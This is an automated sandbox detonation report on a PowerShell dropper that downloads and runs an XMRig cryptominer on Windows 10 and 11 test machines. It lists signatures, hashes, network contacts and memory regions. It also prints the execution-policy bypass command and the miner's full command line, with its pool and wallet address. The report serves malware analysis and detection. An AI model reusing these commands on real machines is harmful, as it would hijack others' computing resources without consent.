Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2092 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2092 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| NL | 52.111.243.30:443 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/2092-0-0x00007FFC63373000-0x00007FFC63375000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t5b30pwy.s3x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2092-9-0x000001A8D84B0000-0x000001A8D84D2000-memory.dmp
memory/2092-10-0x00007FFC63370000-0x00007FFC63E32000-memory.dmp
memory/2092-11-0x00007FFC63370000-0x00007FFC63E32000-memory.dmp
memory/2092-12-0x00007FFC63370000-0x00007FFC63E32000-memory.dmp
memory/2092-14-0x000001A8D8540000-0x000001A8D8552000-memory.dmp
memory/2092-15-0x000001A8D8520000-0x000001A8D852A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2812-46-0x00000167DC9B0000-0x00000167DC9D0000-memory.dmp
memory/2812-47-0x00000167DE1B0000-0x00000167DE1D0000-memory.dmp
memory/2812-48-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2092-49-0x00007FFC63370000-0x00007FFC63E32000-memory.dmp
memory/2812-51-0x00000167DE1F0000-0x00000167DE210000-memory.dmp
memory/2812-50-0x00000167DE1D0000-0x00000167DE1F0000-memory.dmp
memory/2812-52-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2092-53-0x00007FFC63373000-0x00007FFC63375000-memory.dmp
memory/2812-54-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-57-0x00000167DE1F0000-0x00000167DE210000-memory.dmp
memory/2812-56-0x00000167DE1D0000-0x00000167DE1F0000-memory.dmp
memory/2812-55-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-58-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-59-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-60-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-61-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-62-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-63-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-64-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-65-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-66-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-67-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-68-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-69-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-70-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-71-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-72-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-73-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-74-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-75-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-76-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-77-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-78-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-79-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-80-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-81-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-82-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-83-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-84-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-85-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-86-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-87-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-88-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-89-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-90-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-91-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-92-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-93-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-94-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-95-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-96-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-97-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-98-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-99-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-100-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-101-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-102-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-103-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-104-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-105-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-106-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-107-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-108-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-109-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-110-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-111-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-112-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-113-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-114-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-115-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
memory/2812-116-0x00007FF6E5DA0000-0x00007FF6E69D3000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:31
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1783s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 508 wrote to memory of 5044 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 508 wrote to memory of 5044 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
Files
memory/508-3-0x00007FF864DF3000-0x00007FF864DF4000-memory.dmp
memory/508-5-0x000001DDC5D70000-0x000001DDC5D92000-memory.dmp
memory/508-8-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/508-9-0x000001DDDE580000-0x000001DDDE5F6000-memory.dmp
memory/508-10-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsisydro.ndb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/508-25-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/508-48-0x000001DDC5F40000-0x000001DDC5F52000-memory.dmp
memory/508-61-0x000001DDC5F30000-0x000001DDC5F3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5044-90-0x000001FF8D930000-0x000001FF8D950000-memory.dmp
memory/5044-91-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/508-93-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/5044-92-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/508-94-0x00007FF864DF3000-0x00007FF864DF4000-memory.dmp
memory/508-95-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/508-96-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/5044-97-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-98-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-99-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-100-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-101-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-102-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-103-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-104-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-105-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-106-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-107-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-108-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-109-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-110-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-111-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-112-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-113-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-114-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-115-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-116-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-117-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-118-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-119-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-120-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-121-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-122-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-123-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-124-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-125-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-126-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-127-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-128-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-129-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-130-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-131-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-132-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-133-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-134-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-135-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-136-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-137-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-138-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-139-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-140-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-141-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-142-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-143-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-144-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-145-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-146-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-147-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-148-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-149-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-150-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-151-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-152-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-153-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-154-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-155-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-156-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-157-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:33
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1767s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3012 wrote to memory of 3600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3012 wrote to memory of 3600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3012-0-0x00007FFC3FCC3000-0x00007FFC3FCC5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oqfyimuh.yng.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3012-9-0x0000020F77570000-0x0000020F77592000-memory.dmp
memory/3012-10-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp
memory/3012-11-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp
memory/3012-12-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp
memory/3012-14-0x0000020F77600000-0x0000020F77612000-memory.dmp
memory/3012-15-0x0000020F775E0000-0x0000020F775EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3600-46-0x0000020DC56B0000-0x0000020DC56D0000-memory.dmp
memory/3600-47-0x0000020DC6FE0000-0x0000020DC7000000-memory.dmp
memory/3600-48-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-49-0x0000020DC7000000-0x0000020DC7020000-memory.dmp
memory/3600-50-0x0000020E59BC0000-0x0000020E59BE0000-memory.dmp
memory/3012-52-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp
memory/3600-51-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3012-53-0x00007FFC3FCC3000-0x00007FFC3FCC5000-memory.dmp
